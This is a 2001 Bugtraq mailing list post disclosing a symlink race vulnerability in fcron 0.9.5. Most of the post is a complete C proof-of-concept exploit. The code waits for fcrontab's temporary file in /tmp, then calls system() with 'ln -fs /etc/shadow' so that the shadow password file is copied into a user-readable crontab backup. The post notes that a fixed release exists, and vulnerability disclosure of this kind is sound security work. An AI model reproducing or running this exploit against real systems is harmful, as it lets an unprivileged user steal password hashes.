Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

fcron 0.9.5 is vulnerable to a symlink attack

From: kiss from Helisec <NIKEBOY () RETEMAIL ES>
Date: Wed, 28 Feb 2001 21:30:18 +0100
What we need:

         we need that root updates our crontab file ( # fcrontab -u kiss -e)

What we get:

         we get written /etc/shadow in our crontab file (or any other file we
want)

This is just a proof of concept. What we have to do is run the exploit above
from a normal user shell. Then, in a root console, we update that user's
crontab. After that, just check the contents of <user>.orig and you'll find
/etc/shadow  right there :-).

/* --------------------------
   fcrontab exploit by _kiss_
   --------------------------
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <time.h>
#include <dirent.h>

#define TRUE 1

void main() {

         struct stat buf;
         time_t modif1,modif2;
         DIR *dir;
         struct dirent *direntry;
          int found=0;
          char string[200];
          char string2[200];

         printf ("---------------------------------------------\n");
         printf ("              fcrontab exploit by _kiss_\n");
         printf (" Helios Security and Administration (HeliSec)\n\n");
         printf (" Greets: Jet-Li (for teaching me some lessons of shell\n");
         printf ("            that i will need someday) :D\n");
         printf ("---------------------------------------------\n");

         /* we wait till /tmp/fcrontab is created */
         printf("\nwaiting for /tmp/fcrontab to be created...\n");

         while(!found) {

                 dir=opendir("/tmp");

                 while ((direntry=readdir(dir))!=NULL) {
                         if (strncmp("fcrontab",direntry->d_name,8)==0)
                                 found=1;
                         if (found==1) break;
                 }

                 closedir(dir);
         }

         strcpy(string,"/tmp/");
         strcat(string,direntry->d_name);

         while (TRUE) {
                 if (stat(string,&buf)!=-1)
                         break;
         }

         /* we store date of last modification */
         printf("/tmp/fcrontab created. waiting for the update...\n");
         modif1=buf.st_mtime;

         /* we wait till /tmp/fcrontab is updated */
         do {
                 stat(string,&buf);
                 modif2=buf.st_mtime;
         } while (modif1==modif2);

         /* we make the symlink */
         printf("making a symlink to /etc/shadow...\n");
         strcpy(string2,"ln -fs /etc/shadow ");
         strcat(string2,string);
         system(string2);

         /* we should now have /etc/shadow in /var/spool/fcron/kiss.orig */
         printf("... now check /var/spool/fcron/kiss.orig\n");
}


NOTE: a new version has been released to correct this bug (1.0.1), and it can
be found at fcron.free.fr

                                 _kiss_ from HeliSec
Previous By Date Next
Previous By Thread Next

Current thread: